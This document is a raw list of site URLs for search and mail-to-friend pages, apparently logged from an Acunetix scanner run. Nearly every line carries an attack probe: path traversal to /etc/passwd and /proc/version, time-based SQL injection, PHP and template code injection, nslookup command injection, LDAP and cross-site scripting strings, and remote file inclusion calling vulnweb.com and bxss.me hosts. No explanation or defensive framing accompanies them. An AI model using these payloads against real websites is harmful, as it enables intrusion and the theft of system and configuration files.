/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././article/1-testsayfasi
/mailto/?link='\
/mailto/?link=../../../../../../../../../../etc/passwd%00.jpg&template=beez_20&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e%5cu0022onmouseover=pnMW(9941)%5cu0022&template=beez_20&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=%f0''%f0\
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=';print(md5(acunetix_wvs_security_test));%24a='&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=-1%20OR%203%2b392-392-1=0%2b0%2b0%2b1&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=../../../../../../../../../../../../../../../../etc/passwd&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=1Rx0MAOh';%20waitfor%20delay%20'0:0:6'%20--%20&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=WEB-INF/web.xml&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=%24(nslookup%202iUdTaeP)
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=%24{%40print(md5(acunetix_wvs_security_test))}%5c
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=%252fetc%252fpasswd
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=-1%20OR%202%2b125-125-1=0%2b0%2b0%2b1%20--%20
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=-1%20OR%203%2b491-491-1=0%2b0%2b0%2b1
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=../../../../../../../../../../../../../../../proc/version
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=/www.vulnweb.com
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=TqvlJgEW';%20waitfor%20delay%20'0:0:9'%20--%20
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=component
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=component'%20AND%202*3*8=6*8%20AND%20'2rki'='2rki
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=component'\
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e&template=beez_20&tmpl=pGHPuwHw');select%20pg_sleep(3);%20--%20
/mailto/?link=0011f090d89f910f3d24e9873575a8d16029ca3e9837711&template=beez_20&tmpl=component
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=!(()%26%26!%7c*%7c*%7c&tmpl=component
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=/www.vulnweb.com&tmpl=component
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=GZuafL1g'));select%20pg_sleep(6);%20--%20&tmpl=component
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=%bf'%bf\
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=BLl6tw4Q');select%20pg_sleep(2);%20--%20
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=JyI=
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=WEB-INF/web.xml
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=component
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=file://etc/passwd
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=http:/testasp.vulnweb.com/t/fit.txt%3F.jpg
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20&tmpl=response.write(9295186*9290206)
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=beez_20'\
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=http:/hitQrIeds92mL.bxss.me/&tmpl=component
/mailto/?link=90ed7f9d717b47dafcf4b4c1bb9de7c57b1fb587&template=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&tmpl=component
/mailto/?link=JyI=&template=beez_20&tmpl=component
/mailto/?link=WEB-INF%5cweb.xml&template=beez_20&tmpl=component
/mailto/?link=WEB-INF/web.xml&template=beez_20&tmpl=component
/mailto/?link=acux7014%C0%BEz1%C0%BCz2a%90bcxuca7014&template=beez_20&tmpl=component
/mailto/?link=http:/testasp.vulnweb.com/t/fit.txt%3F.jpg&template=beez_20&tmpl=component
/mailto/?link[$acunetix]=1&template=beez_20&tmpl=component
/search/?ordering=%252fetc%252fpasswd&searchphrase=any&searchword=
/search/?ordering=';print(md5(acunetix_wvs_security_test));%24a='&searchphrase=any&searchword=
/search/?ordering=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd&searchphrase=all&searchword=
/search/?ordering=../../../../../../../../../../../../../../../proc/version&searchphrase=all&searchword=
/search/?ordering=../../../../../../../../../../etc/passwd%00.jpg&searchphrase=any&searchword=
/search/?ordering=../../../../../../../../../../etc/passwd&searchphrase=all&searchword=
/search/?ordering=/.././.././.././.././.././.././.././../etc/./passwd%2500&searchphrase=any&searchword=
/search/?ordering=/etc/passwd&searchphrase=any&searchword=
/search/?ordering=1%00%c0%a7%c0%a2%252527%252522&searchphrase=all&searchword=
/search/?ordering=12345'\
/search/?ordering=1some_inexistent_file_with_long_name%00.jpg&searchphrase=any&searchword=
/search/?ordering=47jJilkL';select%20pg_sleep(3);%20--%20&searchphrase=any&searchword=
/search/?ordering=<!--&searchphrase=any&searchword=
/search/?ordering=HV7e4NNJ'));select%20pg_sleep(6);%20--%20&searchphrase=any&searchword=
/search/?ordering=Http:/testasp.vulnweb.com/t/fit.txt&searchphrase=any&searchword=
/search/?ordering=alpha&searchphrase=%24{%40print(md5(acunetix_wvs_security_test))}%5c&searchword=
/search/?ordering=alpha&searchphrase=%24{9999165%2b10000184}&searchword=
/search/?ordering=alpha&searchphrase=)&searchword=
/search/?ordering=alpha&searchphrase=.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd&searchword=
/search/?ordering=alpha&searchphrase=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd&searchword=
/search/?ordering=alpha&searchphrase=../../../../../../../../../../etc/passwd&searchword=
/search/?ordering=alpha&searchphrase=/WEB-INF/web.xml&searchword=
/search/?ordering=alpha&searchphrase=all&searchword=
/search/?ordering=alpha&searchphrase=all&searchword=%40%404DOwW
/search/?ordering=alpha&searchphrase=all&searchword='\
/search/?ordering=alpha&searchphrase=all&searchword=-1%20OR%203%2b456-456-1=0%2b0%2b0%2b1
/search/?ordering=alpha&searchphrase=all&searchword=-1;%20waitfor%20delay%20'0:0:15'%20--%20
/search/?ordering=alpha&searchphrase=all&searchword=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
/search/?ordering=alpha&searchphrase=all&searchword=/%5cwww.vulnweb.com
/search/?ordering=alpha&searchphrase=all&searchword=JyI=
/search/?ordering=alpha&searchphrase=all&searchword=http:/www.vulnweb.com
/search/?ordering=alpha&searchphrase=all&searchword=if(now()=sysdate()%2csleep(10)%2c0)/*'XOR(if(now()=sysdate()%2csleep(10)%2c0))OR'\
/search/?ordering=alpha&searchphrase=all9512038&searchword=
/search/?ordering=alpha&searchphrase=yCArCHyN'));select%20pg_sleep(8);%20--%20&searchword=
/search/?ordering=category&searchphrase=!(()%26%26!%7c*%7c*%7c&searchword=
/search/?ordering=category&searchphrase=)&searchword=
/search/?ordering=category&searchphrase=-1\
/search/?ordering=category&searchphrase=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&searchword=
/search/?ordering=category&searchphrase=/../../../../../../../../../../etc/passwd%00.jpg&searchword=
/search/?ordering=category&searchphrase=1some_inexistent_file_with_long_name%00.jpg&searchword=
/search/?ordering=category&searchphrase=;print(md5(acunetix_wvs_security_test));&searchword=
/search/?ordering=category&searchphrase=JiGqqOlj';%20waitfor%20delay%20'0:0:5'%20--%20&searchword=
/search/?ordering=category&searchphrase=JyI=&searchword=
/search/?ordering=category&searchphrase=WEB-INF%5cweb.xml&searchword=
/search/?ordering=category&searchphrase=all&searchword=%f0''%f0\
/search/?ordering=category&searchphrase=all&searchword=-1;select%20pg_sleep(6);%20--%20
/search/?ordering=category&searchphrase=all&searchword=.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/search/?ordering=category&searchphrase=all&searchword=../../../../../../../../../../etc/passwd%00.jpg
/search/?ordering=category&searchphrase=all&searchword=/%5cwww.vulnweb.com
/search/?ordering=category&searchphrase=all&searchword=/www.vulnweb.com
/search/?ordering=category&searchphrase=all&searchword=/WEB-INF/web.xml
/search/?ordering=category&searchphrase=all&searchword=/etc/passwd
/search/?ordering=category&searchphrase=all&searchword=1\
/search/?ordering=category&searchphrase=all&searchword=Zvq1N0Q0';%20waitfor%20delay%20'0:0:6'%20--%20
/search/?ordering=category&searchphrase=all&searchword=\
/search/?ordering=category&searchphrase=all&searchword={{9999742*10000313}}
/search/?ordering=category&searchphrase=all&searchword[]=
/search/?ordering=category&searchphrase=all'\
/search/?ordering=category&searchphrase=file://etc/passwd&searchword=
/search/?ordering=category&searchphrase=http:/hitW3VbHVIQeE.bxss.me/&searchword=
/search/?ordering=category&searchphrase=index.php%00&searchword=
/search/?ordering=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&searchphrase=any&searchword=
/search/?ordering=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&searchphrase=all&searchword=
/search/?ordering=newest%26n944645=v964541&searchphrase=all&searchword=
/search/?ordering=newest&searchphrase=%f0''%f0\
/search/?ordering=newest&searchphrase=-1%20OR%202%2b869-869-1=0%2b0%2b0%2b1&searchword=
/search/?ordering=newest&searchphrase=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&searchword=
/search/?ordering=newest&searchphrase=../../../../../../../../../../etc/passwd&searchword=
/search/?ordering=newest&searchphrase=1%00%c0%a7%c0%a2%252527%252522&searchword=
/search/?ordering=newest&searchphrase=;print(md5(acunetix_wvs_security_test));&searchword=
/search/?ordering=newest&searchphrase=JyI=&searchword=
/search/?ordering=newest&searchphrase=\
/search/?ordering=newest&searchphrase=all&searchword=!(()%26%26!%7c*%7c*%7c
/search/?ordering=newest&searchphrase=all&searchword=%24{%40print(md5(acunetix_wvs_security_test))}
/search/?ordering=newest&searchphrase=all&searchword=%2531%2522%256F%256E%256D%256F%2575%2573%2565%256F%2576%2565%2572%253D%2552%2542%2555%2554%2528%2539%2538%2530%2533%2529%2522
/search/?ordering=newest&searchphrase=all&searchword=%f0''%f0\
/search/?ordering=newest&searchphrase=all&searchword='\
/search/?ordering=newest&searchphrase=all&searchword=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
/search/?ordering=newest&searchphrase=all&searchword=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/search/?ordering=newest&searchphrase=all&searchword=../../../../../../../../../../../../../../../proc/version
/search/?ordering=newest&searchphrase=all&searchword=/../../../../../../../../../../etc/passwd%00.jpg
/search/?ordering=newest&searchphrase=all&searchword=/www.vulnweb.com
/search/?ordering=newest&searchphrase=all&searchword=1
/search/?ordering=newest&searchphrase=all&searchword=1'\
/search/?ordering=newest&searchphrase=all&searchword=1some_inexistent_file_with_long_name%00.jpg
/search/?ordering=newest&searchphrase=all&searchword=;print(md5(acunetix_wvs_security_test));
/search/?ordering=newest&searchphrase=all&searchword=<!--
/search/?ordering=newest&searchphrase=all&searchword=IgkTIWyG';%20waitfor%20delay%20'0:0:4'%20--%20
/search/?ordering=newest&searchphrase=all&searchword=http:/www.vulnweb.com
/search/?ordering=newest&searchphrase=all&searchword=index.php/.
/search/?ordering=newest&searchphrase=all&searchword=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/search/?ordering=newest&searchphrase=all&searchword=testasp.vulnweb.com
/search/?ordering=newest&searchphrase=all&searchword={{9999402*10000482}}
/search/?ordering=newest&searchphrase=all'\
/search/?ordering=newest&searchphrase=all9253449&searchword=
/search/?ordering=newest&searchphrase=any&searchword=
/search/?ordering=newest&searchphrase=any&searchword=%5c
/search/?ordering=newest&searchphrase=any&searchword=%f0''%f0\
/search/?ordering=newest&searchphrase=any&searchword='\
/search/?ordering=newest&searchphrase=any&searchword=../../../../../../../../../../../../../../../../etc/passwd
/search/?ordering=newest&searchphrase=any&searchword=/www.vulnweb.com
/search/?ordering=newest&searchphrase=any&searchword=12345'\
/search/?ordering=newest&searchphrase=any&searchword=1\
/search/?ordering=newest&searchphrase=any&searchword=8geeM43Y
/search/?ordering=newest&searchphrase=any&searchword=DfRBpxgY';select%20pg_sleep(14);%20--%20
/search/?ordering=newest&searchphrase=any&searchword=Http:/testasp.vulnweb.com/t/fit.txt
/search/?ordering=newest&searchphrase=any&searchword=acux8209%C0%BEz1%C0%BCz2a%90bcxuca8209
/search/?ordering=newest&searchphrase=any&searchword=http:/testasp.vulnweb.com/t/xss.html%3f%2500.jpg
/search/?ordering=newest&searchphrase=any&searchword=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/search/?ordering=newest&searchphrase=any&searchword=testasp.vulnweb.com
/search/?ordering=newest&searchphrase=file://etc/passwd&searchword=
/search/?ordering=newest&searchphrase=index.php/.&searchword=
/search/?ordering=newest&searchphrase=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&searchword=
/search/?ordering=oldest&searchphrase=%40%400Oo3E&searchword=
/search/?ordering=oldest&searchphrase=all&searchword=
/search/?ordering=oldest&searchphrase=all&searchword=%bf'%bf\
/search/?ordering=oldest&searchphrase=all&searchword=)
/search/?ordering=oldest&searchphrase=all&searchword=-1%20OR%202%2b898-898-1=0%2b0%2b0%2b1
/search/?ordering=oldest&searchphrase=all&searchword=../../../../../../../../../../../../../../../proc/version
/search/?ordering=oldest&searchphrase=all&searchword=/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd
/search/?ordering=oldest&searchphrase=all&searchword=1*1*1*1
/search/?ordering=oldest&searchphrase=all&searchword=19647541
/search/?ordering=oldest&searchphrase=all&searchword=1\
/search/?ordering=oldest&searchphrase=all&searchword=1some_inexistent_file_with_long_name%00.jpg
/search/?ordering=oldest&searchphrase=all&searchword=acu4836%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4836
/search/?ordering=oldest&searchphrase=all&searchword=if(now()=sysdate()%2csleep(3)%2c0)/*'XOR(if(now()=sysdate()%2csleep(3)%2c0))OR'\
/search/?ordering=oldest&searchphrase=all&searchword=joBZq9n6';%20waitfor%20delay%20'0:0:9'%20--%20
/search/?ordering=oldest&searchphrase=all&searchword=testasp.vulnweb.com
/search/?ordering=oldest&searchphrase=any&searchword=!(()%26%26!%7c*%7c*%7c
/search/?ordering=oldest&searchphrase=any&searchword=%5e(%23%24!%40%23%24)(()))******
/search/?ordering=oldest&searchphrase=any&searchword='%2bresponse.write(9696811*9478124)%2b'
/search/?ordering=oldest&searchphrase=any&searchword=../../../../../../../../../../../../../../../proc/version
/search/?ordering=oldest&searchphrase=any&searchword=../../../../../../../../../../etc/passwd
/search/?ordering=oldest&searchphrase=any&searchword=1'\
/search/?ordering=oldest&searchphrase=any&searchword=910729
/search/?ordering=oldest&searchphrase=any&searchword=VoN00ql1
/search/?ordering=oldest&searchphrase=http:/some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&searchword=
/search/?ordering=oldest&searchphrase=index.php&searchword=
/search/?ordering=oldest&searchphrase[]=all&searchword=
/search/?ordering=popular&searchphrase=%24(nslookup%20RsyDy7AK)&searchword=
/search/?ordering=popular&searchphrase=%24{%40print(md5(acunetix_wvs_security_test))}%5c&searchword=
/search/?ordering=popular&searchphrase='\
/search/?ordering=popular&searchphrase=(select(0)from(select(sleep(12)))v)/*'%2b(select(0)from(select(sleep(12)))v)%2b'\
/search/?ordering=popular&searchphrase=-1%20OR%202%2b456-456-1=0%2b0%2b0%2b1%20--%20&searchword=
/search/?ordering=popular&searchphrase=-1'%20OR%202%2b284-284-1=0%2b0%2b0%2b1%20or%20'vjNGOfjl'='&searchword=
/search/?ordering=popular&searchphrase=/.././.././.././.././.././.././.././../etc/./passwd%2500&searchword=
/search/?ordering=popular&searchphrase=1%00%c0%a7%c0%a2%252527%252522&searchword=
/search/?ordering=popular&searchphrase=12345'\
/search/?ordering=popular&searchphrase=<!--&searchword=
/search/?ordering=popular&searchphrase=Http:/testasp.vulnweb.com/t/fit.txt&searchword=
/search/?ordering=popular&searchphrase=WEB-INF/web.xml&searchword=
/search/?ordering=popular&searchphrase=all&searchword=
/search/?ordering=popular&searchphrase=all&searchword=!(()%26%26!%7c*%7c*%7c
/search/?ordering=popular&searchphrase=all&searchword=';print(md5(acunetix_wvs_security_test));%24a='
/search/?ordering=popular&searchphrase=all&searchword=-1;select%20pg_sleep(12);%20--%20
/search/?ordering=popular&searchphrase=all&searchword=..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/search/?ordering=popular&searchphrase=all&searchword=/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd
/search/?ordering=popular&searchphrase=all&searchword=/WEB-INF/web.xml
/search/?ordering=popular&searchphrase=all&searchword=/etc/passwd
/search/?ordering=popular&searchphrase=all&searchword=19459683
/search/?ordering=popular&searchphrase=all&searchword=<!--
/search/?ordering=popular&searchphrase=all&searchword=WEB-INF%5cweb.xml
/search/?ordering=popular&searchphrase=all&searchword=index.php%00
